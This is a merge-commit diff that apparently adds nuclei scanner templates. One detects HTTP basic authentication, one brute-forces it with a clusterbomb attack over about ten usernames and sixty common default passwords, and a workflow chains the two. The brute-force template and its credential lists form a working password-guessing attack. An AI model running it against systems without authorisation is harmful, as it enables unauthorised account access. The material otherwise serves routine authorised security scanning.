Merge pull request #556 from projectdiscovery/basic-auth-fuzzing

Adding basic auth fuzzing

fuzzing/basic-auth-bruteforce.yaml

@@ -0,0 +1,98 @@
+id: basic-auth-bruteforce
+
+info:
+  name: Basic Auth Bruteforce
+  author: "@w4cky_"
+  severity: high
+
+  # Impotent Notes:-
+  # This is specific template to work with basic 401 authentication endpoint.
+  # Do not run this template on non basic authentication related endpoints to avoid false positive results.
+
+requests:
+
+  - payloads:
+      username:
+        - admin
+        - manager
+        - administrator
+        - username
+        - login
+        - anonymous
+        - test
+        - guest
+        - root
+        - demo
+
+      password:
+        - admin
+        - pass1
+        - pass1
+        - root
+        - welcome
+        - p@ssw0rd
+        - user
+        - test
+        - testest
+        - dupa8
+        - admin123
+        - admin1234
+        - admin12345
+        - anonymous
+        - manager
+        - linux
+        - system
+        - oracle
+        - administrator
+        - 11111111
+        - qwerty123
+        - cisco123
+        - admin123456
+        - 1qazXSW@
+        - master
+        - 123qweasd
+        - 1qaz2wsx
+        - 123456789
+        - 1234567890
+        - !qaz@wsx
+        - !q@w
+        - wubao
+        - pa55w0rd
+        - 123abc
+        - 123456
+        - 123456789
+        - qwerty
+        - password
+        - 1111111
+        - 12345678
+        - abc123
+        - 1234567
+        - password1
+        - 12345
+        - 1234567890
+        - 123123
+        - 000000
+        - Iloveyou
+        - 1234
+        - 1q2w3e4r5t
+        - Qwertyuiop
+        - 123
+        - Monkey
+        - Dragon
+        - demo
+
+    attack: clusterbomb
+
+    raw:
+      - |
+        GET /protected HTTP/1.1
+        Host: {{Hostname}}
+        Authorization: Basic {{base64('username:password')}}
+        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0
+        Accept-Language: en-US,en;q=0.9
+        Connection: close
+
+    matchers:
+      - type: status
+        status:
+          - 200

technologies/basic-auth-detection.yaml

@@ -0,0 +1,22 @@
+id: basic-auth-detection
+
+info:
+  name: Basic auth detection
+  author: "@w4cky_"
+  severity: info
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 401
+
+      - type: word
+        words:
+          - "Www-Authenticate:"
+        part: header

workflows/basic-auth-workflow.yaml

@@ -0,0 +1,15 @@
+id: basic-auth-workflow
+
+info:
+  name: Basic auth detection and bruteforce workflow
+  author: "@w4cky_"
+
+variables:
+  basic_auth_detect: technologies/basic-auth-detection.yaml
+  basic_auth_bruteforce: fuzzing/basic-auth-bruteforce.yaml
+
+logic:
+  |
+  if basic_auth_detect()  {
+     basic_auth_bruteforce()
+        }